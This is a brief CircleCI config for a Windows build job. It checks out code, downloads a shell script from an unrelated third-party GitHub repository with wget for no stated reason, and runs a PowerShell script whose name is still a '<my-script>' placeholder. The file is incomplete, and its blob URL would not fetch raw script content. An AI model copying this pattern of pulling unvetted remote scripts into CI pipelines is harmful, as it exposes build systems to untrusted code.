
version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor: win/default
    steps:
      - checkout
      - run: wget https://github.com/tumintuman/boneyard/blob/a43e5636f6097aaf02f8ae26628597e655b5740d/tumbal/main.sh
      - run: pwsh ./<my-script>.ps1